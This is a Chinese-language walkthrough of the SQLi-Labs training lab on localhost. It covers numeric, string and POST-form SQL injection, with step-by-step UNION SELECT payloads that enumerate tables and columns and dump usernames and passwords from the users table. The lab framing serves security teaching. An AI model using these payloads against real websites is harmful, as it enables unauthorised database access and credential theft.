sql-labs数字型、字符型注入

访问SQLi-Labs网站

一、数字型注入

1、访问less-2

访问后根据提示先给定一个GET参数

此时页面显示id=1的用户名和密码

2、寻找注入点、判断注入类型

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >> 运行后正常显示

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 >>运行后未正常显示

由以上可以判断，存在数字型注入

3、判断网站查询的列数

尝试使用 order by
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 3–+ >>正常显示

4、判断网站回显位

利用union select 判断
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,3–+

5、获取网站所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,database()–+

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+

7、获取users表的全部列名
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+

8、获取users表id、username和password的值
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(’~’,id,username,password) from security.users limit 0,1–+

由于users表中存放着多组数据，我们可以通过limit M,N 的方式逐条显示

二、字符型注入

1、访问 less-1

http://127.0.0.1/bc/sqli-labs/Less-1/

2、寻找注入点

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ >>运行报错

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’=‘1 >>运行后正常显示

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’='2 >>运行后未正常显示

由此可以判断存在字符型注入

3、判断网站列数

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1‘ order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 3–+ >>正常显示

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ order by 4–+ >>报错
网站查询字段数为3

4、判断网站回显位

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,3–+

2号3号可以回显

5、获取当前所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,database()–+

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+

7、获取users表的全部列名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+

8、获取users表id、username和password列的全部值

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,concat_ws(’~’,id,username,password)from security.users limit 0,1 --+

三、POST注入

1、访问less-11

http://127.0.0.1/bc/sqli-labs/Less-11/

2、利用burp suite工具抓包

在浏览器访问less-11登录界面，输入用户名admin，密码任意，点击submit按钮

将获取的数据包发送到repeater选项卡下

3、寻找注入点

在POST表单处，使用payload判断
uname=amdin’&passwd=123&submit=Submit >>报错

uname=admin’#&passwd=123&submit=Submit 回显正常用户名和密码

4、判断列数

uname=admin’order by 1#&passwd=123&submit=Submit
uname=admin’order by 2#&passwd=123&submit=Submit
正常回显

uname=admin’order by 3#&passwd=123&submit=Submit
报错

可以判断，网站查询字段数为2

5、判断网站回显位置

uname=admin’and 1=2 union select 1,2#&passwd=123&submit=Submit

1号和2号都能回显

6、获取网站当前所在数据库名

uname=admin’and 1=2 union select 1,database()#&passwd=123&submit=Submit

7、获取数据库security的全部表名

uname=admin’and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’#&passwd=123&submit=Submit

8、获取users表的全部列名

uname=admin’and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#&passwd=123&submit=Submit

9、获取users表id、username和password列的所有值

uname=admin’and 1=2 union select 1,concat_ws(’~’,id,username,password) from security.users limit 0,1#&passwd=123&submit=Submit